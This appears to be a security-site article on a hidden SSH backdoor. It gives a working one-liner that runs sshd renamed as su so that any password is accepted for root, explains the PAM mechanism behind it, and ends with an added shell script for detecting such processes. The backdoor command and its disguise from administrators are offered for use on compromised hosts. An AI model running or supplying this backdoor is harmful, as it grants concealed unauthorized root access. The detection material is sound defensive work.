
Abusing a system behaviour to disguise a password-free login backdoor

Source: compiled by this site   Author: knpewg85942   Date: 2017-07-04

This backdoor relies on a small trick. If you have penetrated a system, hold a root shell on it, and the target's firewall does not block inbound connections, the method below starts a second sshd that lets root log in with any password at all. It is aimed at administrators with little security awareness or experience, who will only ever see an extra process named su. Two conditions must hold for the login shown below to succeed: sshd must authenticate through PAM (UsePAM yes, the Debian default) and the effective sshd_config must allow root password logins (PermitRootLogin yes); both can be forced with additional -o options on the same command line if the host's config differs. Run the following on the compromised host to start the backdoor:
# ln -sf /usr/sbin/sshd /tmp/su;nohup /tmp/su -oPort=2022 &

Then open a new login session to test it:

Account: root, password: anything you like

Login succeeds.

0x01. Why the login works without a password
The backdoor started above runs as a process named su. When sshd authenticates a login through PAM it passes its own program name, taken from argv[0], as the PAM service name (this is the default build; packages configured with --with-pam-service=sshd hard-code "sshd" instead, and the trick does not apply to them). PAM then loads /etc/pam.d/<service>, so this instance authenticates against /etc/pam.d/su. Nothing about su in particular is required: any name that matches a file in /etc/pam.d/ makes the system authenticate with that file's stack. What makes su useful is its first rule, "auth sufficient pam_rootok.so": pam_rootok succeeds whenever the calling process has real uid 0 and never looks at the supplied password. sshd's privileged process runs as root, so the password phase passes for any account the server will admit, not only root, and whatever the client typed is accepted. Two side effects help defenders: /proc/PID/exe of the backdoor still resolves to /usr/sbin/sshd, and because sshd also uses argv[0] as its syslog identifier, the resulting auth.log entries are tagged su[PID] rather than sshd[PID]. For reference, the file looks like this (Kali 2 system):
    #
    # The PAM configuration file for the Shadow `su' service
    #
   
    # This allows root to su without passwords (normal operation)
    auth       sufficient pam_rootok.so
   
    # Uncomment this to force users to be a member of group root
    # before they can use `su'. You can also add "group=foo"
    # to the end of this line if you want to use a group other
    # than the default "root" (but this may have side effect of
    # denying "root" user, unless she's a member of "foo" or explicitly
    # permitted earlier by e.g. "sufficient pam_rootok.so").
    # (Replaces the `SU_WHEEL_ONLY' option from login.defs)
    # auth       required   pam_wheel.so
   
    # Uncomment this if you want wheel members to be able to
    # su without a password.
    # auth       sufficient pam_wheel.so trust
   
    # Uncomment this if you want members of a specific group to not
    # be allowed to use su at all.
    # auth       required   pam_wheel.so deny group=nosu
   
    # Uncomment and edit /etc/security/time.conf if you need to set
    # time restrainst on su usage.
    # (Replaces the `PORTTIME_CHECKS_ENAB' option from login.defs
    # as well as /etc/porttime)
    # account    requisite  pam_time.so
   
    # This module parses environment configuration file(s)
    # and also allows you to use an extended config
    # file /etc/security/pam_env.conf.
    #
    # parsing /etc/environment needs "readenv=1"
    session       required   pam_env.so readenv=1
    # locale variables are also kept into /etc/default/locale in etch
    # reading this file *in addition to /etc/environment* does not hurt
    session       required   pam_env.so readenv=1 envfile=/etc/default/locale
   
    # Defines the MAIL environment variable
    # However, userdel also needs MAIL_DIR and MAIL_FILE variables
    # in /etc/login.defs to make sure that removing a user
    # also removes the user's mail spool file.
    # See comments in /etc/login.defs
    #
    # "nopen" stands to avoid reporting new mail when su'ing to another user
    session    optional   pam_mail.so nopen
   
    # Sets up user limits according to /etc/security/limits.conf
    # (Replaces the use of /etc/limits in old login)
    session    required   pam_limits.so

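The following detection script is an added example and is not part of the original article; the function name find_renamed_sshd and its argument layout are this example's own, not those of any real tool. It assumes a Linux /proc layout and reports every process whose executable resolves to sshd but whose argv[0] basename (the name PAM will use as the service) is something else, together with whether a matching file exists in /etc/pam.d. Both the proc root and the pam.d directory are parameters so it can be run against a copied or reconstructed tree.

```shell
#!/bin/sh
# Added example (not from the original article): hunt for an sshd binary that
# was started under another name, e.g. via "ln -sf /usr/sbin/sshd /tmp/su".
# Because sshd derives its PAM service name from argv[0], such a process
# authenticates against /etc/pam.d/<argv0-basename> instead of /etc/pam.d/sshd.
# Function and variable names are this example's own, not a real tool's.

# find_renamed_sshd PROC_ROOT PAMD_DIR
#   Walks PROC_ROOT (normally /proc). For every process whose executable
#   resolves to sshd but whose argv[0] basename is not "sshd", prints:
#     <pid> <argv0> <resolved exe> pam-service=<name>(exists|missing)
#   "exists" means PAMD_DIR/<name> is present, i.e. PAM will honour that
#   file's stack (for "su" that starts with "auth sufficient pam_rootok.so").
find_renamed_sshd() {
    local proc_root pamd_dir pid_dir pid exe exe_base argv0 svc state
    proc_root="${1:-/proc}"
    pamd_dir="${2:-/etc/pam.d}"
    for pid_dir in "$proc_root"/[0-9]*; do
        [ -d "$pid_dir" ] || continue
        pid="${pid_dir##*/}"
        # /proc/PID/exe points at the file that was actually executed, so the
        # symlink does not hide the real binary here. Entries we cannot read
        # (other users' processes without root, kernel threads) are skipped.
        exe="$(readlink "$pid_dir/exe" 2>/dev/null)" || continue
        exe_base="${exe##*/}"
        case "$exe_base" in
            sshd|"sshd (deleted)") ;;   # also catch a copy unlinked from disk
            *) continue ;;
        esac
        # argv[0] is the first NUL-terminated field of /proc/PID/cmdline; it is
        # the path the attacker typed, e.g. /tmp/su.
        argv0="$(tr '\0' '\n' < "$pid_dir/cmdline" 2>/dev/null | head -n 1)"
        [ -n "$argv0" ] || continue
        svc="${argv0##*/}"
        # A genuine daemon is started as .../sshd; anything else is suspicious.
        if [ "$svc" = "sshd" ]; then
            continue
        fi
        if [ -f "$pamd_dir/$svc" ]; then
            state="exists"
        else
            state="missing"
        fi
        printf '%s %s %s pam-service=%s(%s)\n' "$pid" "$argv0" "$exe" "$svc" "$state"
    done
}

# Stand-alone use on a live host (run as root to see every process):
#   sh detect_renamed_sshd.sh --scan
if [ "${1:-}" = "--scan" ]; then
    find_renamed_sshd "${2:-/proc}" "${3:-/etc/pam.d}"
fi
```

On a live host, pair the output with a listing of listening sockets (for example ss -ltnp) to spot an sshd on an unexpected port, and check auth.log for entries tagged with the renamed service. Cleanup is killing the reported PID and removing the symlink it was started from.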
